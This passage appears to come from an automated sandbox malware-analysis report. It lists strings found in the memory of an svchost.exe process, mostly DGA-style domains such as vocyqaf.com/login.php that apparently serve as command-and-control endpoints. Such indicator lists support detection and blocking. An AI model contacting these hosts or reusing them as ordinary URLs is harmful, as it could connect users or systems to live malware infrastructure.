Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071373291.000000000B404000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473585967.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2474118106.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2445920188.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexynol.com/login.php
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052689552.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052518318.000000000B505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexyqyv.com/login.php
Source: svchost.exe, 00000002.00000003.2425680040.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031297551.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2040854796.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425676866.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2423195846.000000000B536000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexyriq.com/login.php
Source: svchost.exe, 00000002.00000003.2394184434.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2019860947.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2001269447.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2002557567.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547005817.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560027172.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1998878428.000000000B523000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473745496.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2492823798.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2397913686.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2006795851.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003027083.0000000002948000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2012053019.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2528215560.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181277.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2536096244.000000000B4F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexysig.com/login.php
Source: svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2128851747.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexyxop.com/login.php
Source: svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocybam.com/login.php
Source: svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2095357907.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2532272707.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2502894281.000000000B5A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocycat.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2019860947.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003027083.0000000002948000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2012053019.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocydof.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocygyk.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071373291.000000000B404000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocyjet.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899403726.00000000029A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899516782.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1892728741.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1896454428.00000000029A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1896515314.000000000B448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocyjic.com/login.php
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053649667.000000000673C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2054890780.0000000006677000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2043884959.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2055126343.000000000667A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053087644.00000000029CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocykif.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2064178580.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066831254.00000000029CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocymak.com/login.php
Source: svchost.exe, 00000002.00000003.2023916183.00000000066AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2020443071.00000000066A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2023729607.00000000066A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocypyt.com/H
Source: svchost.exe, 00000002.00000003.2264854529.00000000046FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocyqaf.com/http://lymytux.com/H
Source: svchost.exe, 00000002.00000003.2264854529.00000000046FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocyqaf.com/http://volyjok.com/http://lyryxij.com/H
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1964244036.00000000029D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352433999.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1789493415.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793845752.0000000006676000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352846166.000000000B534000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1797125735.000000000667A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2266499150.000000000B404000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2264867591.000000000B536000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1796798404.00000000029CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2266296927.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocyqaf.com/login.php
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052689552.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052518318.000000000B505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocyquc.com/login.php
Source: svchost.exe, 00000002.00000003.2425680040.0000000002945000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocyrom.com/http://gahyhys.com/http://gahyhys.com/http://qegyhev.com/http://purycul.com/http:
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2040163445.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031331008.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031297551.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2413687945.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036084916.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036454724.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2034067878.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocyrom.com/login.php
Source: svchost.exe, 00000002.00000003.2040163445.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocyrom.com/login.php0
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031331008.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425676866.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2413687945.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2423195846.000000000B536000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036454724.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2034067878.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocyzek.com/login.php
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2055822668.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052689552.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052518318.000000000B505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofybic.com/login.php
Source: svchost.exe, 00000002.00000003.2264854529.00000000046FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofybyf.com/Pm
Source: svchost.exe, 00000002.00000003.2576508233.000000000B411000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615882312.000000000B41C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2576724081.000000000B41B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofycim.com/0l
Source: svchost.exe, 00000002.00000003.2055722798.00000000066C4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2048160160.00000000066C4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2055773582.00000000066C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofydut.com/Revoked
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052689552.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052518318.000000000B505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofydut.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2019860947.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547005817.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560027172.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004274360.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473745496.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2492823798.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003764256.000000000B4FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2007310582.000000000B4FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003027083.0000000002948000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2012053019.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2528215560.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2536096244.000000000B4F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofykoc.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473585967.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2474118106.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofypam.com/login.php
Source: svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofypuk.com/http://lymyjon.com/0
Source: svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofypuk.com/p
Source: svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2109895377.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofyqek.com/login.php
Source: svchost.exe, 00000002.00000003.2088422532.0000000006677000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473585967.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2474118106.000000000B537000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofyruc.com/login.php
Source: svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565639625.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2589839623.0000000002946000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2095357907.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2104551479.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080107692.000000000B53C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460730847.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080123231.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2575906953.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078386316.000000000B53C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofyzof.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofyzym.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071802239.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2445920188.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2064178580.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066831254.00000000029CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojybim.com/login.php
Source: svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2551144785.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2510214419.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473585967.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557412147.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080107692.000000000B53C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2474118106.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2520844909.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2517095584.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078386316.000000000B53C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojycec.com/login.php
Source: svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004394237.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003033215.00000000029A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004274360.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373704287.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376344539.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojycif.com/login.php
Source: svchost.exe, 00000002.00000003.2577183287.00000000029C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615644364.000000000B400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2130330367.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615964782.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2145251441.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2593876696.00000000029C4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2602579791.00000000066DF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2128851747.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2599201022.00000000046FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2123452647.000000000B5AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2593516239.00000000029A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2575606390.00000000029BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojydoc.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2069506631.000000000673C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojyduf.com/login.php
